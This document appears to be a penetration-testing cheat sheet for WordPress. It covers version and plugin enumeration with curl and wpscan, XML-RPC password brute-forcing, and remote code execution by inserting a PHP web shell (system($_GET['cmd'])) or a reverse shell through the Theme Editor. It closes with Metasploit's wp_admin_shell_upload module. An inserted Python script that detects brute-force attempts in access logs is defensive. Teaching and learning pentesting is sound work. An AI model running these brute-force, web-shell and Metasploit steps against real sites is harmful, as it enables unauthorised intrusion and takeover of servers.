
WordPress

WordPress is a popular open-source content management system (CMS) that allows users to create and manage websites easily. It powers over 40% of websites on the internet and supports themes, plugins, and custom development. It is widely used for blogs, business sites, e-commerce, and more due to its flexibility and user-friendly interface.

Tech Stack of WordPress

  • Backend: PHP
  • Frontend: HTML, CSS, JavaScript (jQuery, React for Gutenberg editor)
  • Database: MySQL or MariaDB
  • Server: Apache or Nginx

File Structure

/wordpress-root
├── wp-admin/        # Core admin dashboard files
├── wp-content/      # User-uploaded content (themes, plugins, uploads)
│   ├── plugins/     # Installed plugins (security risk if outdated)
│   ├── themes/      # Installed themes (can be exploited if vulnerable)
│   └── uploads/     # Media uploads (potential for malicious file uploads)
├── wp-includes/     # Core WordPress functions and libraries
├── .htaccess        # Web server configuration (can be abused for redirections)
├── index.php        # Main entry point of WordPress
├── wp-config.php    # Database credentials & security keys (critical target for attackers)
├── wp-login.php     # WordPress login page (brute-force attack target)
├── xmlrpc.php       # Used for remote publishing (often abused for DDoS attacks)
├── readme.html      # Default file exposing version info (can aid attackers)
└── license.txt      # WordPress license information

Enumeration

## Version enumeration
## Note: use Wappalyzer or look at the page source.
curl -s https://blog.rezydev.xyz/ | grep '<meta name="generator"'

## Older WordPress versions ship a 'readme.html' that reveals the WordPress version

## WpEnumX (plugin and theme enumeration)
python3 WpEnumX.py --wp-url=https://blog.rezydev.xyz/
# https://github.com/Rezy-Dev/WpEnumX

## If directory listing is enabled
curl -s https://blog.rezydev.xyz/wp-content/plugins/plugin-name/ | html2text

## Install wpscan
gem install wpscan

## Use wpscan
wpscan --url http://blog.rezydev.xyz/ --enumerate --api-token <API> --random-user-agent

## Note: an API token can be obtained from https://wpscan.com/api/

Exploitation

## If we know a valid username, we can try password brute-forcing over XML-RPC
wpscan --password-attack xmlrpc -t 20 -U admin,jethalal -P passwords.txt --url http://blog.rezydev.xyz/
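Seen from the web server's side, the password-guessing attempt above shows up as a burst of POSTs to wp-login.php or xmlrpc.php from one source. The script below is an added example, not part of the original notes: it parses combined-format access log lines (a constructed sample is embedded) and flags any source that exceeds a threshold of auth POSTs inside a sliding window. The log format, the threshold and the window length are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format as written by Apache/nginx, one request per line (assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# The two endpoints the notes above name as password-guessing targets.
AUTH_PATHS = ("/wp-login.php", "/xmlrpc.php")

def parse_line(line):
    """Return (ip, timestamp, method, path-without-query, status) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]
    return m.group("ip"), ts, m.group("method"), path, int(m.group("status"))

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Map each source IP that POSTs to an auth endpoint more than
    `threshold` times inside any sliding `window` to its peak count."""
    stamps_by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] in AUTH_PATHS:
            stamps_by_ip[rec[0]].append(rec[1])
    hits = {}
    for ip, stamps in stamps_by_ip.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # slide the window forward
                start += 1
            count = end - start + 1
            if count > threshold:
                hits[ip] = max(hits.get(ip, 0), count)
    return hits

# Constructed sample log: one source hammering xmlrpc.php, plus benign noise.
SAMPLE_LOG = [
    f'203.0.113.5 - - [10/Mar/2025:12:00:{s:02d} +0000] "POST /xmlrpc.php HTTP/1.1" 200 421'
    for s in (1, 4, 9, 13, 18, 22, 27)
] + [
    '198.51.100.7 - - [10/Mar/2025:12:00:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
    '198.51.100.7 - - [10/Mar/2025:12:30:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
    '198.51.100.9 - - [10/Mar/2025:12:01:00 +0000] "GET /readme.html HTTP/1.1" 200 7400',
]
```

Because an XML-RPC attack can pack many guesses into a single system.multicall request, keep the threshold for xmlrpc.php low or inspect request bodies as well; where remote publishing is not needed, blocking xmlrpc.php removes the channel entirely.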

RCE with Theme Editor (Needs Admin Permissions)

The WordPress Theme Editor (Appearance > Theme File Editor) allows modifying PHP files directly from the dashboard. Attackers with admin or compromised credentials can inject malicious PHP code to gain Remote Code Execution (RCE).

Exploitation Steps

  1. Log in to WordPress as an admin.

  2. Navigate to Appearance > Theme File Editor.

  3. Edit a file such as functions.php or 404.php and insert:

    <?php system($_GET['cmd']); ?> ## or a reverse shell such as pentestmonkey/php-reverse-shell

  4. Execute commands via:

    http://blog.rezydev.xyz/wp-content/themes/theme-name/404.php?cmd=whoami

    http://blog.rezydev.xyz/wp-content/themes/theme-name/404.php ## just visit the page if
    ## a reverse-shell script was inserted, and catch the shell with netcat

Metasploit Theme Editor Hack

Metasploit can exploit the WordPress Theme Editor to inject malicious PHP code and gain Remote Code Execution (RCE). This requires admin credentials or an existing vulnerability that grants access.

msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set RHOSTS <target-ip>
set USERNAME <admin>
set PASSWORD <password>
set TARGETURI /wordpress # Adjust if WP is in a subdirectory
exploit ## or 'run'